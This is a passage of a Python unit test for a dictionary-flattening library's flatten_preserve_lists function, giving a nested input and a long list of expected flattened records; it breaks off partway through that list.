def test_flatten_preserve_lists_issue43_nested(self):
"""https://github.com/amirziai/flatten/issues/43"""
dic = {
'a': {'a': ["x0", "x1", "x2"]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [
{'foo': 2, 'bar': 6, 'baz':
["n1", "n2", "n3", "n1.1", "n2.2"]},
{'foo': 5, 'bar': 7, 'baz': ["n4", "n5", "n6"]},
{'foo': float('nan')},
{'foo': 100},
]},
'd': {'g': 10},
'f': {'h': 100, 'gar': [
{"gup": 200, "garp": [
{"gu": 300, "gat": ["f7", "f8"]},
{"gu": 800, "gat": ["f9", "f10", "f11"]}
]
}]}
}
actual = flatten_preserve_lists(dic, max_depth=100, max_list_index=30)
expected = [
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
